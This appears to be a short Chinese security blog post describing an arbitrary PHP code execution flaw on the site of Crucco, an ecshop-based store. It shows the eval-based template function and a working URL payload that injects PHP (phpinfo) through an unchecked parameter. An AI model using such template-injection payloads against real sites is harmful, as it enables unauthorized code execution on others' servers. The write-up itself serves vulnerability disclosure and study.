您的位置 » 首页 » 渗透测试 » 渗透实例:初刻Crucco主站任意代码执行

渗透实例:初刻Crucco主站任意代码执行

发表于4年前 | 作者: seay | 分类: 渗透测试 | 孵化于:2012年11月28日 | 文章热度:2,540 次 全屏阅读

显示不全请点击全屏阅读

初刻用的是ecshop,但是程序员二次开发中太过随意,导致问题产生。。。

http://www.crucco.com/huodongye.php?pn=zucefangsi
在这里我们发现pn的值没有指定,可以任意提交,我们推断应该程序员写成以下代码
 
$smarty->display($_GET[‘p’]);
我们找到ecshop中的 display方法 发现里面用了eval
 
function _eval($content)
{
ob_start();
eval(‘?’ . ‘>’ . trim($content));
$content = ob_get_contents();
ob_end_clean();
 
return $content;
}
 
我们提交以下url:
http://www.crucco.com/huodongye.php?pn=str:%3C?php%20phpinfo%28%29;//
会发现可爱的phpinfo出来了
 
作者:kelon

Tags:

代码执行,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/1770/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)